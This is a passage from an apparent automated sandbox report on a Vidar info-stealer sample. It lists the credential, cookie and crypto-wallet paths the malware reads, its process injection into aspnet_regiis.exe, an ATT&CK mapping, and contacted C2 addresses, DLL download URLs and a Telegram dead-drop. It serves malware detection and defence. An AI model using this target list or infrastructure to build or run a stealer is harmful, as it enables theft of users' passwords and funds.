Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                          Tries to harvest and steal Bitcoin Wallet information
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: Yara matchFile source: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7620, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d771000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d771000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d740000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7620, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CE10C40 sqlite3_bind_zeroblob,3_2_6CE10C40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CE10D60 sqlite3_bind_parameter_name,3_2_6CE10D60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CD38EA0 sqlite3_clear_bindings,3_2_6CD38EA0

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		2
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		Boot or Logon Initialization Scripts511
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		1
                          Credentials in Registry                          		1
                          Account Discovery                          		Remote Desktop Protocol4
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
                          Obfuscated Files or Information                          		Security Account Manager4
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                          Software Packing                          		NTDS54
                          System Information Discovery                          		Distributed Component Object ModelInput Capture114
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets151
                          Security Software Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Masquerading                          		Cached Domain Credentials31
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                          Virtualization/Sandbox Evasion                          		DCSync12
                          Process Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                          Process Injection                          		Proc Filesystem1
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524652 Sample: file.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 30 steamcommunity.com 2->30 38 Multi AV Scanner detection for domain / URL 2->38 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 12 other signatures 2->44 7 file.exe 3 2->7         started        signatures3 process4 file5 18 C:\Users\user\AppData\Roaming\msvcp110.dll, PE32 7->18 dropped 20 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 7->20 dropped 46 Detected unpacking (changes PE section rights) 7->46 48 Contains functionality to inject code into remote processes 7->48 50 Writes to foreign memory regions 7->50 52 2 other signatures 7->52 11 aspnet_regiis.exe 196 7->11         started        16 conhost.exe 7->16         started        signatures6 process7 dnsIp8 32 49.12.197.9, 443, 57947, 57948 HETZNER-ASDE Germany 11->32 34 steamcommunity.com 104.102.49.254, 443, 57946 AKAMAI-ASUS United States 11->34 36 147.45.44.104, 57970, 80 FREE-NET-ASFREEnetEU Russian Federation 11->36 22 C:\ProgramData\softokn3.dll, PE32 11->22 dropped 24 C:\ProgramData\nss3.dll, PE32 11->24 dropped 26 C:\ProgramData\mozglue.dll, PE32 11->26 dropped 28 3 other files (1 malicious) 11->28 dropped 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->54 56 Found many strings related to Crypto-Wallets (likely being stolen) 11->56 58 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->58 60 5 other signatures 11->60 file9 signatures10

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe28%VirustotalBrowse
                          file.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Roaming\msvcp110.dll100%Joe Sandbox ML
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          steamcommunity.com0%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                          https://player.vimeo.com0%URL Reputationsafe
                          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                          https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                          http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%URL Reputationsafe
                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a0%URL Reputationsafe
                          https://steam.tv/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
                          https://mozilla.org0/0%URL Reputationsafe
                          http://www.entrust.net/rpa030%URL Reputationsafe
                          http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://store.steampowered.com/points/shop/0%URL Reputationsafe
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                          https://www.ecosia.org/newtab/0%URL Reputationsafe
                          https://lv.queniujq.cn0%URL Reputationsafe
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                          https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                          https://checkout.steampowered.com/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%URL Reputationsafe
                          http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                          https://store.steampowered.com/;0%URL Reputationsafe
                          https://www.entrust.net/rpa00%URL Reputationsafe
                          https://store.steampowered.com/about/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
                          http://ocsp.entrust.net030%URL Reputationsafe
                          http://ocsp.entrust.net020%URL Reputationsafe
                          https://help.steampowered.com/en/0%URL Reputationsafe
                          https://store.steampowered.com/news/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/0%URL Reputationsafe
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                          http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
                          https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
                          https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
                          https://49.12.197.9/10%VirustotalBrowse
                          https://steamcommunity.com/profiles/76561199780418869/badges0%VirustotalBrowse
                          https://www.google.com0%VirustotalBrowse
                          https://www.youtube.com0%VirustotalBrowse
                          https://49.12.197.9/sqlp.dll11%VirustotalBrowse
                          https://steamcommunity.com/profiles/76561199780418869S0%VirustotalBrowse
                          http://cowod.hopto.org_DEBUG.zip/c0%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e0%VirustotalBrowse
                          https://49.12.197.9/softokn3.dll0%VirustotalBrowse
                          https://49.12.197.910%VirustotalBrowse
                          https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.00%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol0%VirustotalBrowse
                          https://t.me/ae5ed2%VirustotalBrowse
                          http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP0%VirustotalBrowse
                          https://sketchfab.com0%VirustotalBrowse
                          https://www.youtube.com/0%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en0%VirustotalBrowse
                          https://49.12.197.9/vcruntime140.dll0%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a0%VirustotalBrowse
                          https://49.12.197.9/freebl3.dll0%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          steamcommunity.com
                          		104.102.49.254
                          		truetrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://49.12.197.9/trueunknown
                          https://49.12.197.9/freebl3.dlltrueunknown
                          https://49.12.197.9/sqlp.dlltrueunknown
                          https://49.12.197.9/softokn3.dlltrueunknown
                          https://49.12.197.9/vcruntime140.dlltrueunknown
                          https://49.12.197.9/nss3.dlltrue
                            		unknown
                            https://49.12.197.9/mozglue.dlltrue
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003290000.00000004.00000020.00020000.00000000.sdmp, GIEBFH.3.drfalse
                                		unknown
                                https://49.12.197.9/Zaspnet_regiis.exe, 00000003.00000003.1630664282.0000000003187000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.0000000003181000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.0000000003181000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645187719.0000000003186000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://player.vimeo.comaspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://49.12.197.9/QKaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://49.12.197.9/freebl3.dllpDataaspnet_regiis.exe, 00000003.00000003.1748296840.00000000031E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                      https://steamcommunity.com/?subsection=broadcastsaspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                      https://49.12.197.9/freebl3.dllGaspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1748296840.00000000031E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.gstatic.cn/recaptcha/aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://steamcommunity.com/profiles/76561199780418869Saspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://steamcommunity.com/profiles/76561199780418869/badgesaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                        http://www.valvesoftware.com/legal.htmaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.youtube.comaspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
